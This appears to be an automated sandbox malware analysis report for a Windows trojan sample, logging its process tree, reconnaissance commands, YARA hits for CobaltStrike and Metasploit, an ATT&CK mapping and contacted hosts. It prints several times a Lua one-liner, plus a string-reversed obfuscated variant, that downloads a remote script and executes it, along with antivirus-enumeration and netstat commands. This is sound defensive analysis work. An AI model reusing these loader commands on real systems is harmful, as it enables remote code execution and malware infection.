Source: C:\5a70dbc53fcf0baade86ff\install.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC os get caption
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\lua\lua.exe C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: unknown unknown
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr LISTEN
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr 127.0.0.1:

Source: unknown	Process created: C:\ProgramData\lua\luac.exe C:\ProgramData\lua\luac.exe -e 'code = \'local http=require('socket.http');\'..\'local response_body = {}\'..\'local res, code = http.request({\'..\' url = string.reverse('aul.344-SC-1/68x/moc.scnuyila.gnokgnoh-nc-sso.sbilaul//:ptth'),\'..\' sink = ltn12.sink.table(response_body)\'..\'})\'..\'if type(response_body) == 'table' then\'..\' loadstring(table.concat(response_body))()\'..\'else\'..\' print('error')\'..\'end\';loadstring(code)();'
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\lua\lua.exe C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C %ProgramData%\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\lua\lua.exe C:\ProgramData\lua\lua.exe -e 'local code = [[local http = require('socket.http');local response_body = {};local res, code = http.request({url = 'http://lualibs.oss-cn-hongkong.aliyuncs.com/x86/Schedule.lua',sink = ltn12.sink.table(response_body)});if type(response_body) == 'table' then loadstring(table.concat(response_body))() else print('error') end;]];loadstring(code)();'

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

6_2_01004B0F

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

Code function: 6_2_010039E5 AllocateAndInitializeSid,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLengthSid,GetTokenInformation,GetLengthSid,

6_2_010039E5

Language, Device and Operating System Detection:

Source: C:\ProgramData\lua\luac.exe

Code function: 3_2_00A24B49 cpuid

3_2_00A24B49

Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: #17,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,KiUserCallbackDispatcher,DefWindowProcW,LoadLibraryW,InterlockedExchange,CommandLineToArgvW,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,GetUserDefaultUILanguage,GetLocaleInfoW,MessageBoxW,DeleteCriticalSection,CloseHandle,__wcsicmp,RegCloseKey,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,KiUserCallbackDispatcher,EnterCriticalSection,__wstrtime_s,__snprintf_s,WriteFile,LeaveCriticalSection,DeleteCriticalSection,CloseHandle,	11_2_010929D0
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: GetLocaleInfoA,	11_2_010A8A7D
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: GetLocaleInfoA,	24_2_00C3AD24
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: GetLocaleInfoA,	36_2_00CFC961
Source: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\Silverlight.Configuration.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	36_2_00CE0110

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua\alien VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua\lua VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua\lua\socket VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua\mime VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\ProgramData\lua\socket VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lua.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\lua.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\lua\lua.exe	Queries volume information: C:\Windows\Temp\2021-07-12-10-29-42.zip VolumeInformation

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Code function: 1_2_00007FF7BF67F27A GetSystemTimePreciseAsFileTime,

1_2_00007FF7BF67F27A

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe

Code function: 1_2_00007FF7BF67F3CB SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,GetTimeZoneInformation,

1_2_00007FF7BF67F3CB

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

6_2_0100369A

Source: C:\Users\user\AppData\Roaming\Silverlight.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : SELECT displayName FROM antivirusproduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : SELECT displayName FROM antivirusproduct

Stealing of Sensitive Information:

Gathers network related connection and port information

Show sources

Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\ProgramData\lua\luac.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano	Jump to behavior
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\ProgramData\lua\lua.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c netstat -ano\|findstr LISTEN\|findstr 127.0.0.1:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano

Remote Access Functionality:

Yara detected CobaltStrike

Show sources

Source: Yara match

File source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY

Yara detected CobaltStrike

Show sources

Source: Yara match	File source: 00000003.00000002.491261145.0000000001E80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.493743865.0000000002460000.00000040.00000001.sdmp, type: MEMORY

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 00000003.00000002.482412566.000000000048A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.487308738.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.486483728.00000000008EC000.00000004.00000001.sdmp, type: MEMORY

Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_009942F0 bind,WSAGetLastError,		3_2_009942F0
Source: C:\ProgramData\lua\luac.exe	Code function: 3_2_00994330 listen,WSAGetLastError,		3_2_00994330

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer13	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	DLL Search Order Hijacking2	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	LSASS Memory	System Network Connections Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter13	Application Shimming1	DLL Search Order Hijacking2	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Application Shimming1	Software Packing11	NTDS	System Information Discovery36	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection11	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Scheduled Task/Job1	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery41	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Search Order Hijacking2	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading12	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	System Network Configuration Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WhQZ6UbCEY.exe	17%	Metadefender		Browse
WhQZ6UbCEY.exe	30%	ReversingLabs	Win64.Trojan.Cometer

Dropped Files

Source	Detection	Scanner	Label	Link
C:\5a70dbc53fcf0baade86ff\install.exe	2%	Metadefender		Browse
C:\5a70dbc53fcf0baade86ff\install.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://45.154.13.94/F8JD2R	0%	Avira URL Cloud	safe
http://127.0.0.1:T	0%	Avira URL Cloud	safe
45.154.13.94	0%	Avira URL Cloud	safe
http://127.0.0.1:	0%	Avira URL Cloud	safe
http://127.0.0.1:43990	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
eu-central-1.oss-acc.aliyuncs.com	47.254.186.176	true	false	high
lualibs.oss-cn-hongkong.aliyuncs.com	47.75.19.154	true	false	high
g.msn.com	unknown	unknown	false	high
softres.oss-accelerate.aliyuncs.com	unknown	unknown	false	high
lualibs.oss-accelerate.aliyuncs.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.154.13.94/F8JD2R	true	Avira URL Cloud: safe	unknown
45.154.13.94	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://g.msn.com/1ewenusDefaultPack/MSA_Link_DEDE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_D	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_CSCZ5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_C	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_RURU5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_R	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ETEE5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_E	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ZHCN5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_Z	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_PTPT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ITIT5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_I	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_THTH5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_T	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_PTBR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_P	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_DADK5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_D	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_SRCYRL7http://g.msn.com/1ewenusDefaultPack/Privacy_Link	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_ARAR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_A	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://127.0.0.1:T	luac.exe, 00000003.00000002.485998444.0000000000890000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://g.msn.com/1ewenusDefaultPack/MSA_Link_KOKR5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_K	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
http://g.msn.com/1ewenusDefaultPack/MSA_Link_FIFI5http://g.msn.com/1ewenusDefaultPack/Privacy_Link_F	Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe	false		high
